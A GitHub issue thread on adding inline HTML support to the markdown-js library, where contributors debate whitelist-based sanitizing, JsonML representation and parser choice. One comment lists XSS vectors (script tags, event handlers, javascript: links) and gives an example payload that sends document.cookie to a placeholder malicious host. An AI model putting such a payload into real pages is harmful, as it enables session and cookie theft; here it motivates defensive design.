HTML support #16

tj · 2011-02-28T19:05:47Z

would be really nice, and bring it closer to the discount implementation

xavi- · 2011-04-20T13:53:34Z

+1

nddrylliog · 2011-05-11T19:39:43Z

+1 ! :)

sp · 2011-06-20T15:50:18Z

I think this is more than a "nice to have" - it's kind of a basic feature of markdown. See http://daringfireball.net/projects/markdown/syntax#html.

ashb · 2011-06-20T16:27:04Z

It's basic, but my personal view is that it's a really bad idea to mix Markdown and HTML.

If someone writes the code to do this I'll happily accept it - I'm just not going to write it myself.

nddrylliog · 2011-06-20T16:28:46Z

Well if markdown had something for styling (if only defining CSS classes..), I wouldn't need it. Does anyone have ideas?

ashb · 2011-06-20T16:34:39Z

We've got a Maruku dialect (http://maruku.rubyforge.org/proposal.html) that supports their metadata proposal, so you can do:

## Heading ## {: #my-id }

This is a para
{ .my-class }

to add ids and classes.
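
To make the attribute syntax shown above a little more concrete, here is a minimal sketch of how such a `{: #id .class }` list might be turned into an attribute object. The function name `parseAttributeList` is hypothetical and this is not how markdown-js's Maruku dialect is actually implemented; it only handles `#id` and `.class` tokens and ignores `key=value` pairs.

```javascript
// Hypothetical helper: parse a Maruku-style attribute list such as
// "{: #my-id .my-class }" into a plain attribute object.
// Only "#id" and ".class" tokens are understood in this sketch.
function parseAttributeList(source) {
  var match = /^\{:?\s*(.*?)\s*\}$/.exec(String(source).trim());
  if (!match) {
    return null; // not an attribute list at all
  }
  var attrs = {};
  var classes = [];
  match[1].split(/\s+/).forEach(function (token) {
    if (token === "") {
      return; // empty list, e.g. "{: }"
    }
    if (token.charAt(0) === "#") {
      attrs.id = token.slice(1);
    } else if (token.charAt(0) === ".") {
      classes.push(token.slice(1));
    }
    // Anything else (e.g. key=value) is ignored here.
  });
  if (classes.length > 0) {
    attrs["class"] = classes.join(" ");
  }
  return attrs;
}
```

For example, `parseAttributeList("{: #my-id }")` yields an object whose `id` is `"my-id"`, and text that is not wrapped in braces yields `null`.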

xavi- · 2011-06-20T17:53:38Z

My main issue with the lack of HTML support is that it makes tables much harder. I know there are various implementations/proposals for a table syntax in markdown, but it does not seem like markdown-js supports any.

awirick · 2011-06-22T20:02:08Z

+1 - I'd use this for tables and other non-markdown supported tags (video).

jarrodbell · 2011-07-21T00:52:42Z

+1 required for any table support (including CSS for styling the tables globally via <STYLE> tags)
Anyone recommend another parser that supports this?

jarrodbell · 2011-07-21T10:01:06Z

Found @cadorn's fork, which includes inline HTML and works great!
https://github.com/cadorn/markdown-js

ashb · 2011-07-21T10:10:46Z

Can you test that a bit more thoroughly and let me know if it works? Then we'll get it merged in.

jarrodbell · 2011-07-21T10:14:59Z

I've used it for extensive table creation and inline <STYLE> tags, and it works perfectly.

kragen · 2011-07-28T14:17:09Z

This is a duplicate of issue 11.

I don't think cadorn's fork should be merged in in its current state; although it looks like a good solution for applications like writing blog posts you host on your own server, it's only applicable in cases where you completely trust the source of the Markdown, and as such, it would open XSS security holes in applications that are currently using markdown-js to render input across trust boundaries. I'm pasting here the comment that I made on his commit:

So, while on one hand I really want this feature for my application of markdown-js, on the other hand I really want a way to filter the HTML to keep out things like the following:

unclosed <blockquote>
<script>
<a onmouseover>
<a href="jscript:...">
<a href="mocha:...">
<a href=" javascript:...">
<iframe>
<img width=1 height=1 src="http://...">
other things not mentioned here.

I think I'd also be a little happier with something other than false as the tag for as-is blocks. It is JSON-serializable, I suppose... I don't suppose there's a JSONML spec for this kind of thing, is there? Last I checked, the JSONML spec wasn't even clear as to whether the contents of JSONML elements were supposed to be CDATA or PCDATA.

I think another thing that we run into trouble with is entity handling. I ought to be able to write &copy; 2011 Kragen Javier Sitaker in a Markdown document and have the &copy; entity get passed through to the output (as you can see that it is in this comment, where it renders as ©). And the list from the spec, "<span>, <cite>, or <del>", is just a list of examples, not a complete list of span-level HTML tags; the intent is that any span-level HTML tag can be used in those contexts.

What this adds up to is that we probably need to run all the strings that are the contents of paragraphs, list items, or headers, through a more or less actual HTML parser that can be supplied with whitelists of tags, attributes, and URL schemes, so that it can successfully pass through the subset of well-formed HTML that's right for the application in question. In modern browsers, we could actually use DOMParser, but in Node we might have to use our own. It probably doesn't have to be quite as robust as a browser's parser, since many applications (and basically all applications that use some arbitrary subset of HTML) will give the user a chance to preview and fix their Markdown, so if it barfs on overlapping span-level tags (as GitHub sort of does: <b>overlapping <i>span-level</b> tags</i>) or unclosed tags, it's not a big deal.
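
As a rough illustration of the URL-scheme part of such a whitelist, here is a minimal sketch. The function name `isAllowedUrl` and the default scheme list are assumptions made for this example and are not part of markdown-js. It also assumes the attribute value has already been entity-decoded by whatever HTML parser is in use.

```javascript
// Hypothetical helper: decide whether a URL taken from an href/src attribute
// is acceptable, using a whitelist of schemes rather than a blacklist.
var DEFAULT_SCHEMES = ["http", "https", "mailto"]; // assumed defaults

function isAllowedUrl(url, allowedSchemes) {
  allowedSchemes = allowedSchemes || DEFAULT_SCHEMES;
  // Browsers tolerate leading whitespace and embedded tabs/newlines in a
  // URL, so strip whitespace and control characters before looking for a
  // scheme. This catches forms like " javascript:..." and "java\tscript:...".
  var cleaned = String(url).replace(/[\u0000-\u0020]+/g, "");
  var match = /^([a-zA-Z][a-zA-Z0-9+.\-]*):/.exec(cleaned);
  if (!match) {
    // No scheme: a relative URL, which inherits the page's own scheme.
    return true;
  }
  return allowedSchemes.indexOf(match[1].toLowerCase()) !== -1;
}
```

Because the check is a whitelist, schemes such as `jscript:` or `mocha:` are rejected without having to be listed anywhere.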

I'm not proposing that you should do all this work for me; I was just checking out the network to see if someone had already done it. It looks like you're the one that's come closest. Would it be useful to you if I did what I'm describing? Would it remove the need for the code in this commit for you?

(Edited: fixed a typo.)

cadorn · 2011-07-28T18:19:46Z

@kragen - I am all for a more intelligent HTML parser the way you describe it. I am using this lib to render documentation for my internal projects so there was no need to check the HTML. Should be pretty easy to hook into what I have started.

kragen · 2011-07-29T13:13:00Z

(I've bolded some phrases below to facilitate skimming; hope it's not too annoying when you're reading straight through.)

Okay, well, I guess I'm committed to implementing this, then. Here's what I'm thinking about how to do it. Is this a good way to do it? I'd really appreciate comments before I go haring off without the benefit of other people's advice and experience.

JsonML doesn't have a spec written in English, as far as I can tell, just a BNF grammar and some example implementations in XSLT and JS with the DOM. As far as I can tell, both of the example implementations unescape entity references on input and re-escape them on output, although there's no English text to explain whether this is intentional or a bug.

I assert that this is a bug, because it robs JsonML of any way to represent SGML entity references. I propose that JsonML strings should be treated as PCDATA — allowed to contain entities but not tags — rather than CDATA (plain text) or HTML (text with entities and tags).

Accordingly, when we parse a code block or inline code chunk, we should escape & and < in it, and when we parse any other node, we should run it through an HTML parser to break it down into subnodes, ensuring that it's well-formed, modulo possible references to entities that we don't know about. (I don't propose to include a list of all defined HTML entities into markdown-js.) This means that in general we will not escape HTML on output. It also means that the effect of poorly-nested input tags will be limited to at most one parse-tree node.
The HTML parser used as an input filter should be configurable with whitelists of tags, attributes per tag, and URL schemes per attribute. By default it should be configured with a fairly strict filter, blocking even inline images and iframes with off-host URIs, and of course any possible vector for JS. This will annoy people like cadorn, for whom such filtering is unnecessary, and they need to have an easy way to turn off the whitelists (if not the HTML parsing entirely). But I think that is better than someone doing a git pull on markdown-js and getting privacy and XSS problems added to their application. That is, the default should be safe.
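
The escaping rule for code blocks, and the idea of strings that may contain entities but not tags, can be sketched as follows. Both function names are hypothetical; the second function only checks that something is shaped like an entity reference and, in line with the proposal above, does not consult a list of defined entities.

```javascript
// Escape literal text (for example the contents of a code block) so that it
// can be stored in a string that is treated as PCDATA.
function escapeLiteral(text) {
  return String(text).replace(/&/g, "&amp;").replace(/</g, "&lt;");
}

// Escape text that may already contain entity references: anything shaped
// like a named or numeric entity is left alone, every other "&" and every
// "<" is escaped. Entity names are not validated against a list.
function escapePreservingEntities(text) {
  return String(text)
    .replace(/&(?!(?:[a-zA-Z][a-zA-Z0-9]*|#[0-9]+|#[xX][0-9a-fA-F]+);)/g, "&amp;")
    .replace(/</g, "&lt;");
}
```

With these, `escapeLiteral("&copy;")` gives `&amp;copy;` (the reader sees the literal characters), while `escapePreservingEntities("&copy;")` leaves the entity untouched.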

I'm hoping I can use an existing pure-JS HTML parser — say, jsdom's, or kn_htmlsafe_htmlSanitize, or NodeHtmlParser — rather than hacking one together from scratch. (As a fallback, I could write a very simple parser for the tags-and-attributes subset of XHTML.) I'm a little worried about the performance implications of this; markdown-js is already a little slower than Showdown, and this could make the matter worse. Does anybody have recommendations here?

(In the case where it's running in a modern browser, we could use DOMParser as an optimization, but enough people are using markdown-js in Node that I think it doesn't make sense to depend on that.)

(jsdom: Elijah Insua's MIT-licensed pure-JS implementation of the W3C DOM.)

(kn_htmlsafe_htmlSanitize: Ben Sittler's 3-clause BSD-licensed whitelisting, but not particularly configurable, pure-JS HTML sanitizer.)

(NodeHtmlParser: a forgiving HTML/XML/RSS parser written in JS for both the browser and NodeJS.)

Other variations:

1. Parse HTML on output, not input, instead of building JsonML nodes in the intermediate representation.

This has the disadvantage that it would make some kinds of processing on the intermediate representation harder - for example, in yamemex, I want to support Twitter-style #hashtags, and that will be easier to do if I can tell which hash marks are in the text of the document and which are in some URL somewhere. Also, any markup added by intermediate-representation processing would be prone to being stripped by the output filter.

The advantage is that it would probably make the intermediate processing run faster and take less memory, and it expands the HTML parsers that can be used beyond just those that build a parse tree, which is slow; HTML parsers that simply produce sanitized HTML could be used. Also, the intermediate representation would be simpler, since it wouldn't have HTML tag names in it. This would involve changing the intermediate "JsonML" representation to have HTML rather than CDATA or PCDATA contents, so & would be represented as &amp; in the intermediate representation, not as &, and <b> would mean an actual <b> tag.
2. Leave the semantics of the intermediate representation unchanged aside from adding more tag names, parsing HTML on input and using an exhaustive list of HTML entities to convert things like &copy; (©) and &ddagger; (‡) to Unicode characters. I think this would be a hassle to maintain. (Note that ‡ doesn't show up correctly here because GitHub has undertaken to maintain such a list for their Markdown implementation, and failed. Visit the URL data:text/html,&ddagger; to see that your browser supports it.)
3. Rather than parsing HTML on input or when rendering each node for output, pass through HTML tags from input to output (except inside code blocks, of course) and then run a final HTML-sanitizing pass on the output string to ensure that it's well-formed and safe. This has the advantage of very minimal coupling, and it would handle e.g. <img src="http://webbugs.example.com/"> the same way regardless of whether it was generated from ![ ](http://webbugs.example.com/) or just included literally in the source; the disadvantages are that it may be even slower than the other alternatives (making an additional pass over markup whose well-formedness and safety is guaranteed by construction), it could be a little more bug-prone ("Where did all of my <ol>s go? Oh, I left ol out of the whitelist."), and it doesn't facilitate intermediate processing in any way.

(yamemex: my project using markdown-js for, ultimately, social bookmarking.)

So, what do other people think? The above represents a few hours of me thinking about the problem, but I anticipate that implementing it will take at least a few days of work, so I'd really appreciate help in thinking this through before I jump in.

kragen · 2011-07-29T14:07:02Z

I guess I should elaborate a little bit on the kinds of use cases/threat models I'm thinking of here:

1. Using Markdown to write your own blog on your own domain, which is cadorn's use case. There's little benefit to filtering your markup in this case; the worst case is that your blog is formatted funny because you forgot to close a <blockquote> or something. Unless you copy and paste a chunk of HTML from somewhere else, which brings us to:
2. Using Markdown to render stuff pulled (manually or automatically) from another origin (as defined in the same-origin policy). The risk here is that the author of the stuff may have included some code to take actions on your behalf and exfiltrate your private information (known as "cross-site scripting"), either in a straightforward way such as <script>im=new Image(); im.src="http://malicious.example.com/?"+document.cookie</script> or some more subtle way designed to evade naïve filters. Doing this reliably requires that you use a whitelist rather than a blacklist so you don't end up like the stupid losers who built MySpace. (Samy Kamkar explains the unbelievably incompetent security measures he hacked around to crash MySpace.) Note that this category includes things like blogging software where someone might plausibly copy and paste a piece of someone else's web page in order to quote it.
3. Using Markdown to render stuff sent by a possible spammer or by someone else who has an illegitimate interest in knowing whether you have read it (such as email), in which case you do not want to confirm to the spammer that you have read it. In this case you want to filter out anything whose rendering will generate network traffic (to anywhere other than the source of the rendered document, that is), such as <img src> and <iframe>, as well as all the items covered in category 2 above.

I believe yamemex is in category 2, because I excerpt the pages I bookmark with it all the time. markdown-js is currently safe for this case because it escapes all HTML, but I want it to let through safe HTML. I think that almost any server-based web application that renders Markdown taken from client requests is in category 2, if not category 3, and I think (though I don't know) that many markdown-js applications do that.

cadorn · 2011-07-29T20:04:58Z

I would pull in something like:

- http://stackoverflow.com/questions/295566/sanitize-rewrite-html-on-the-client-side
- http://code.google.com/p/google-caja/source/browse/trunk/src/com/google/caja/plugin/html-sanitizer.js

Don't parse on output. I think it should make it into the JsonML structure and be sanitized by then.

Keep defaults safe and write minimal code using third party tested libraries where possible.

kragen · 2011-07-29T23:04:31Z

Oh hey! That looks nice! Thanks for finding that! I wonder how much of Caja I'd have to pull in to get it to work. Doesn't look like that much.

In general I'm not that enthusiastic about the quality of random third-party "tested" libraries in JS, but Caja is an exception; the project leads are programmers who use JavaScript, not "JavaScript programmers", and they are good ones.

So if the code can be made to do the job (which is still an "if"), that looks like a better option than the alternatives I suggested earlier. Maybe if I dig in I'll change my mind.

Apache 2.0 license should be okay, right, Ash?

ashb · 2011-07-30T15:50:36Z

Good work on your long comment.

PCDATA vs CDATA: you make a good case for it being PCDATA.
At which point should the escaping of < or & be done? In the Markdown JsonML or when converting that to HTML JsonML? (Doing it at the first stage seems slightly off to me at first glance, but I've not thought through the implications of this.)

the default should be safe

Absolutely.

Apache 2 is compatible with BSD, right? In any case I'd prefer that you just require another lib/module rather than pull the source in directly. If that's much of a pain to achieve then a subdir under lib/caja/ works too.

Above all else it seems you've got it well thought out. So long as there are some docs on how it behaves and it's not too tightly tied to only working in one way I'm more than happy to accept a pull request. Bonus points for having tests - I'm happy if these only run under node so long as the code itself is portable to browsers.

FireyFly · 2011-07-30T21:42:57Z

I'll pitch in on this one. I started using this library yesterday and wrote my own small modifications to markdown.js to handle the two problems presented in this issue (HTML tags and character entities). This was before checking the issues page finding this recently-discussed topic. :)

My use case is, for now, limited to my own usage (just like cadorn), but it'd be great with something more reliable than what I currently have. My main problem was actually block-level HTML, that I didn't want to be wrapped in a <p>, so my problem is slightly different.

As for the suggestion of pulling in Caja, I think it sounds like a great idea! Might be good to make it optional though, since, well, it is an additional dependency. Perhaps let it be an option which defaults to on, so that people who don't need the feature don't need to have Caja installed (or can remove it if it has to be bundled in lib/).

Anyway, great to see that this is being worked on/that I'm not the only one who wants HTML support.

kragen · 2011-08-02T15:46:37Z

Hey, I just realized I never responded to the comments above. Didn't do anything this weekend, or yesterday.

Everything is compatible with BSD.

I'm trying to get the regression tests running and fix some smaller bugs first — see #26 if curious.

ap · 2012-05-18T00:54:42Z

@cadorn:

Don’t parse on output.

Why not…? That is what has always seemed most sensible to me – for the reason @kragen mentioned, that it treats all tags the same whatever their provenance. After all Markdown is by intent a shorthand for the most common of HTML. Whether you write *this* or <em>this</em> should really be immaterial, and both equally allowed or not.

cadorn · 2012-05-18T16:46:20Z

@ap This library is great because it has the JsonML intermediate layer. I send the JSON to the client and have the client convert it from JSON to HTML. I think HTML should be sanitized as it enters JsonML. The conversion from JsonML to HTML should be a simple dumb transformation so alternative output formats can be easily targeted.

What exactly are the specific problems with this approach? (The comments above are too verbose to follow.)
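
To illustrate how small a "simple dumb transformation" from JsonML to HTML can be, here is a minimal sketch. It is not markdown-js's own renderer; `renderJsonML` and its helpers are hypothetical names. It assumes an HTML-level tree whose strings are plain text (so they are escaped on output), and it does not special-case void elements such as `br` or `img`.

```javascript
// Escape plain text for use in element content or attribute values.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;");
}

// In JsonML the optional second item of an element is an attribute object.
function isAttributes(value) {
  return typeof value === "object" && value !== null && !Array.isArray(value);
}

// Render a JsonML node: either a string or [tag, attrs?, ...children].
function renderJsonML(node) {
  if (typeof node === "string") {
    return escapeHtml(node);
  }
  var tag = node[0];
  var hasAttrs = node.length > 1 && isAttributes(node[1]);
  var attrs = hasAttrs ? node[1] : {};
  var children = node.slice(hasAttrs ? 2 : 1);

  var html = "<" + tag;
  Object.keys(attrs).forEach(function (name) {
    html += " " + name + '="' + escapeHtml(attrs[name]) + '"';
  });
  html += ">";
  children.forEach(function (child) {
    html += renderJsonML(child);
  });
  return html + "</" + tag + ">";
}
```

Because the renderer makes no decisions of its own, any sanitizing has to have happened before the tree reaches it, which is the division of labour argued for above.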

ashb · 2012-05-18T18:21:08Z

My favoured approach would be to have the HTML parsed and converted into JsonML for two reasons.

The first is as cadorn mentioned. The second is if you parse it into JsonML it should be easier to sanitize/limit the tags that are allowed.

@ap's comment sounds like violent agreement - i.e. you both want the HTML parsed?

ap · 2012-05-19T03:02:15Z

Hmm. Basically I consider a Markdown implementation incomplete unless all constructs that can be written using Markdown shorthand can also be written explicitly using the equivalent HTML – i.e. *this* and <em>this</em> should come out the same. (Likewise for <ol><li> and 1., explicit <p> and double newline, etc. etc.)

So if one is filtered, the other should be too, and if not, then neither should be.

Sanitising at the output stage (after the Markdown has become HTML) has the advantage that a) this equivalence just falls out of the implementation directly with zero further effort and b) the sanitiser is not coupled to the Markdown processor.

If you want to sanitise using an intermediate representation that differentiates between Markdown shorthand and explicit HTML then I guess you’d need to use a mapping table or function from Markdown to HTML so that the sanitiser can use it to treat Markdown shorthand syntax as if it were the implied HTML. That would work. The obvious disadvantage is that you are then effectively converting the Markdown to HTML twice, once for the sanitiser and once for output. However, if sanitising happens server-side and the output conversion on the client, then that may be worthwhile anyhow.

(It would save you the re-parsing using a completely decoupled HTML parser. And maybe the mapping during the sanitisation stage is cheap enough that it is negligible anyway.)

As for targeting alternative output formats, that is essentially a question of converting HTML to the output format in question. Again, by design and intent, Markdown is HTML, just an alternative form that supplies shorthand syntax for a chosen subset of tags. You can convert either all of HTML to the output format or only a defined subset, take your pick – but you convert HTML either way. (E.g. you could pick the subset that only covers the tags which have Markdown shorthands, and that’s fine. Note what this way of looking at it implies: that *this* and <em>this</em> come out the same. Once again.)

Does this help?

cadorn · 2012-05-19T03:15:05Z

What if we convert all known HTML tags (that correspond to markdown syntax) to markdown on input and leave the remaining HTML nodes as HTML (after sanitizing them). This would give a JsonML graph with markdown and HTML nodes allowing for Markdown syntax within HTML content.

We can then have a special tag with some options to optionally wrap a chunk of HTML to customize how it is to be handled (markdown in content or pure HTML).

On the JsonML -> HTML side any HTML nodes just get dumped.

This may be the best solution but harder to implement using a third party library unless you get more into the guts of it.
We need super fast HTML chunk sanitation and a list of html tags to decide what to do.
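
The "list of html tags to decide what to do" could look something like the sketch below. The Markdown-side node names are illustrative and should be checked against lib/markdown.js before being relied on; `classifyHtmlTag` is a hypothetical helper, not an existing markdown-js function.

```javascript
// Assumed mapping from HTML tag names to Markdown-level node names.
// The right-hand names are illustrative, not a verified list.
var HTML_TO_MARKDOWN_NODE = {
  p: "para",
  em: "em",
  strong: "strong",
  code: "inlinecode",
  blockquote: "blockquote",
  ul: "bulletlist",
  ol: "numberlist",
  li: "listitem",
  hr: "hr",
  br: "linebreak",
  a: "link",
  img: "img"
};

// Decide whether an HTML tag has a Markdown equivalent or must stay HTML.
function classifyHtmlTag(tagName) {
  var tag = String(tagName).toLowerCase();
  var heading = /^h([1-6])$/.exec(tag);
  if (heading) {
    return { kind: "markdown", node: "header", level: Number(heading[1]) };
  }
  if (Object.prototype.hasOwnProperty.call(HTML_TO_MARKDOWN_NODE, tag)) {
    return { kind: "markdown", node: HTML_TO_MARKDOWN_NODE[tag] };
  }
  // No Markdown shorthand: keep it as an HTML node, to be sanitized later.
  return { kind: "html", node: tag };
}
```

Tags such as `video` or `table` fall through to the `html` branch and would be left as HTML nodes in the tree.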

ap · 2012-05-19T04:39:53Z

That would work, I think. One thing though, things like <em style="font-size: 2em"> cannot be mapped in the HTML→Markdown direction so there is a likelihood that they will be rejected entirely, whereas if you map Markdown→HTML for sanitisation then this tag would probably get its style attribute stripped but then still be allowed through as a bare <em>.

OTOH if you build a hard-coded Markdown-based list of allowed tags into the sanitiser you can get that effect even with a HTML→Markdown mapping. (Which then means you cannot avoid running the sanitiser by simply dropping all explicit HTML tags, because these hard-coded tags must still be allowed through even if nothing else is. But that’s neither here nor there since Markdown = HTML anyway, so either you don’t sanitise at all or you sanitise both forms…)

ashb · 2012-05-19T08:18:05Z

@ap attributes are possible, certainly at the JsonML level, since the Maruku dialect supports this via: *a*{: style="font-size: 2em" } - the JsonML for it would be [ "em", { "style": "font-size: 2em" }, "a" ] (from memory so might be slightly off).

ap · 2012-05-19T08:38:09Z

I don’t mean whether it is possible to parse them, I mean how they are treated by the sanitiser. If the sanitiser is configured to disallow everything, it should still allow <em style="..."> to pass through as a stripped <em> (if Markdown’s asterisk syntax is permitted), just as output sanitisation after conversion to HTML would behave.

Then if the sanitiser implements equivalence of HTML and Markdown by first mapping HTML to Markdown where there is equivalent Markdown syntax, as @cadorn proposed, then edge cases like this which only half map to Markdown are likely not to work quite like they would with output sanitisation – unless care is taken to support them explicitly.

A good test suite is probably of the essence to ensure that the intent of the explicit support is preserved in the future, though! The separate output HTML filter stage has the advantage that this will all just work as desired by definition, implicitly – it’s robust in a way inline sanitisation is not, albeit, of course, at a performance penalty that we are trying to avoid here.

cadorn · 2012-05-24T16:28:11Z

This lib is for Markdown -> JsonML -> HTML conversion.
We want it to also do Markdown + HTML -> JsonML -> HTML with various options/configurations to allow inline Markdown in HTML and HTML chunks either sanitized or unsanitized.

I have no problem with not being able to go backwards from the resulting HTML to Markdown + HTML if the source HTML used non-standard tags. A warning can be thrown if this happens during the Markdown + HTML -> HTML conversion.

If someone wants bi-directional conversion certain rules must be followed which are too restrictive for many cases.

I want to write website content in Markdown + HTML and want the conversion with HTML and inline Markdown in HTML to JsonML without sanitation as I have control over the source. In this case I want all HTML attributes to come through.

I also want the public to edit markdown + HTML for comments etc... in which sanitation is a must.

I am not going to discuss the same point back and forth any more as I think @ashb and I are on the same page for the overall approach. We just need to work out the details and get coding.

ap · 2012-05-24T18:53:57Z

No problem.

I was referring to this bit from you:

What if we convert all known HTML tags (that correspond to markdown syntax) to markdown on input and leave the remaining HTML nodes as HTML (after sanitizing them).

This is workable, and will mostly fulfil the criterion I was talking about (that if * is allowed then <em> also should be). But consider what happens if the user types <em onclick="...">.

In the scenario where you sanitise by parsing the output, the sanitiser would certainly be configured to allow em elements (because otherwise it would filter out all emphasis) but certainly would not allow onclick attributes (hello XSS!). So what the user who typed <em onclick="..."> would get is a bare <em> tag.

Now if it works the way you suggested, then you will map <em>this</em> to the moral equivalent of *this* (at the JsonML level) in the pre-sanitiser stage. But you cannot do the same for <em onclick="...">. And then if the sanitiser is configured to allow nothing, it still needs hard-wired knowledge of what is expressible in Markdown, so that it will know to output a stripped <em> tag when it encounters that input, instead of stripping it out completely.

Does that help?

cadorn · 2012-05-28T16:23:32Z

<em onclick="..."> would be mapped to *this* + attribute map in JsonML from which you can get <em onclick="..."> back on output if sanitize is switched off or the onclick attr is allowed.

I think we need to hard-wire the Markdown <-> HTML tag mappings anyway to make any of this work.

Looks like we just need a HTML -> JsonML parser and a sanitizer that works on JsonML. It should not be too difficult to modify a good/portable/purejs HTML parser to do that for us.

@ap So are we on the same page now?
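
A sanitizer that works directly on JsonML could be sketched roughly as below. The whitelist contents and the name `sanitizeJsonML` are assumptions for illustration only. In this sketch an element that is not whitelisted is dropped together with its content, attributes that are not whitelisted are stripped, and attribute values such as `href` are not inspected.

```javascript
// Hypothetical whitelist: tag name -> attribute names allowed on that tag.
var DEFAULT_WHITELIST = {
  p: [], em: [], strong: [], code: [], blockquote: [],
  ul: [], ol: [], li: [],
  a: ["href", "title"]
};

// Return a sanitized copy of a JsonML node, or null if it must be dropped.
function sanitizeJsonML(node, whitelist) {
  whitelist = whitelist || DEFAULT_WHITELIST;
  if (typeof node === "string") {
    return node; // text leaf
  }
  var tag = String(node[0]).toLowerCase();
  if (!Object.prototype.hasOwnProperty.call(whitelist, tag)) {
    return null; // tag not allowed: drop the element and its content
  }
  var second = node[1];
  var hasAttrs = typeof second === "object" && second !== null &&
    !Array.isArray(second);
  var attrs = hasAttrs ? second : {};

  // Keep only whitelisted attributes (values are not checked here).
  var kept = {};
  whitelist[tag].forEach(function (name) {
    if (Object.prototype.hasOwnProperty.call(attrs, name)) {
      kept[name] = attrs[name];
    }
  });

  var result = [tag];
  if (Object.keys(kept).length > 0) {
    result.push(kept);
  }
  node.slice(hasAttrs ? 2 : 1).forEach(function (child) {
    var clean = sanitizeJsonML(child, whitelist);
    if (clean !== null) {
      result.push(clean);
    }
  });
  return result;
}
```

With this default whitelist, `["em", { onclick: "..." }, "this"]` comes out as the bare `["em", "this"]`, which matches the behaviour discussed above for `<em onclick="...">`.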

ap · 2012-05-28T16:29:57Z

<em onclick="..."> would be mapped to *this* + attribute map in JsonML

Ahhh. Nice. That addresses the issue I was talking about then, excellent.

Yes, I believe we’re on the same page.

ashb · 2012-05-28T16:48:28Z

Looks like we just need a HTML -> JsonML parser and a sanitizer that works on JsonML

Agreed. But this also seems like a lot of work if you want to deal with less than well-formed HTML - I would be happy for badly formed HTML to just fall back to being parsed as markdown (i.e. you'd see literal < in the output etc.). Thoughts?

ap · 2012-05-28T17:00:15Z

Maybe it’s possible to tie in an existing HTML5 parser?

Otherwise just showing syntactically bad tags as literal text is fine with me.

(Maybe do that by default with the option of adding a parser so that people can pay the cost only if they want it.)
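
The fallback idea can be sketched without a full HTML parser: check that the tags in a chunk nest properly, and if they do not, treat the whole chunk as literal text. The names `isWellFormed` and `htmlOrLiteral` are hypothetical, the list of void tags is deliberately short, and the tag pattern is a simplification (for instance, it does not cope with `>` inside attribute values).

```javascript
var VOID_TAGS = { br: true, hr: true, img: true }; // assumed, not exhaustive

// True if every tag in the chunk is properly nested and closed, and there
// is no stray "<" that is not part of a recognisable tag.
function isWellFormed(chunk) {
  var tagPattern = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)(?:\s[^<>]*?)?(\/?)>/g;
  var stack = [];
  var ok = true;
  var remainder = String(chunk).replace(
    tagPattern,
    function (whole, closing, name, selfClosing) {
      name = name.toLowerCase();
      if (closing) {
        // A closing tag must match the most recently opened tag.
        if (stack.pop() !== name) {
          ok = false;
        }
      } else if (!selfClosing && !VOID_TAGS[name]) {
        stack.push(name);
      }
      return "";
    }
  );
  return ok && stack.length === 0 && remainder.indexOf("<") === -1;
}

// Pass well-formed chunks through as HTML; escape everything else so the
// reader sees the literal "<" in the output.
function htmlOrLiteral(chunk) {
  if (isWellFormed(chunk)) {
    return { type: "html", value: chunk };
  }
  return {
    type: "text",
    value: String(chunk).replace(/&/g, "&amp;").replace(/</g, "&lt;")
  };
}
```

Overlapping tags such as `<b>overlapping <i>span-level</b> tags</i>` and unclosed tags both fail the check and come out as escaped text.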

cadorn · 2012-05-28T20:19:37Z

@ashb Good suggestion. I think it will come down to the HTML parser.

@ap Yes. I think we should definitely try and re-use an existing parser and convert the AST to JsonML.

cadorn · 2012-05-31T16:05:01Z

This list may be a good resource to ask for a HTML to JsonML converter or suggestion about which HTML parser to use: https://groups.google.com/group/js-tools

Do we have a spec for JsonML?

xavi- · 2012-05-31T16:17:37Z

The grammar for JsonML is listed on the website (http://www.jsonml.org/) if that's what you're looking for.

ashb · 2012-05-31T16:20:08Z

And in terms of which node names we use, we kinda just made them up. See... https://github.com/evilstreak/markdown-js/blob/master/lib/markdown.js#L1470-1559

axefrog · 2012-07-21T18:05:08Z

Why are you guys overcomplicating this? Stick an option in there to allow inline html and leave it at that. Default it to false if you want to. Trying to make the decision for the developer that you need to protect them from scenarios (i.e. cross-site scripting) that are outside the scope of translating markdown to html just causes the library to become bloated, less maintainable and annoys all the people who are expecting it to behave as per the original markdown specification.

I suggest you read http://daringfireball.net/projects/markdown/syntax#html - nowhere does it specify that you should escape HTML tags.

If you're going to make it support less than the markdown specification at a minimum, or behave contrary to how markdown should behave, then you should call it something other than markdown and remove the hold on the "markdown" identifier in the npm registry, as there are a huge number of developers out there who see this library as the "preferred" library for markdown in node.js (or otherwise) and then start using it only to discover that you don't support the proper markdown specification.

ashb · 2012-07-21T22:59:07Z

Even a simple 'allow inline HTML' flag needs some level of HTML parsing to know when to switch back to parsing Markdown again:

Note that Markdown formatting syntax is not processed within block-level HTML tags. E.g., you can’t use Markdown-style emphasis inside an HTML block.

I'm personally against putting inline HTML in my markdown as it just feels wrong to me, which is why I haven't written the code to do this yet. If someone submits a pull request that achieves even simple inline HTML and has some tests I'm more than happy to merge it in.

ap · 2012-07-22T12:20:14Z

I’m personally against putting inline HTML in my Markdown as it just feels wrong to me

You have not attained Markdown nature yet, Ash. :-)

ashb · 2013-08-28T11:14:51Z

Just so you are all aware: replying with "+1" and nothing else makes me less likely to want to work on this.

It's going to happen at some point but you aren't helping. I'm going to delete those comments because they just add noise.

adam-stokes · 2013-11-24T16:28:49Z

@ashb any word on this bug? it's been a couple years so just curious if this will be implemented or if you've decided not to..

misterdai · 2014-01-17T14:38:03Z

It'd be nice to have an update on this issue. I ran into it myself but side-stepped it for now by escaping HTML on the way into the Markdown parser. So > would end up as &gt; and I'd replace them on the content that comes back out. Not the nicest route to take but didn't want to muck around with the module itself (for what I was working on).

Ignore my workaround, it didn't allow for code snippets :-(

kevinSuttle · 2014-02-11T22:45:53Z

Yeah I'm just noticing the entity substitution also. Not the biggest deal since a lot of browsers know what it means, and render it accordingly, but still, it'd be nice.

codingisacopingstrategy · 2014-04-03T11:54:41Z

For those asking for updates, there have been a number of pull requests, the most recent of which is #98

adam-stokes · 2014-04-03T12:54:16Z

I wouldn't hold your breath; it doesn't look like the maintainer is planning on doing anything at all.

codingisacopingstrategy · 2014-04-03T14:23:00Z

From the threads I get the impression that this functionality is not really near to the heart of the maintainer, but (s)he hasn’t explicitly said he’ll refuse pull requests… The linked pull request is still open…

I asked for a comment on what is blocking the pull request, so that we know if there is a way to help out.

cheers,

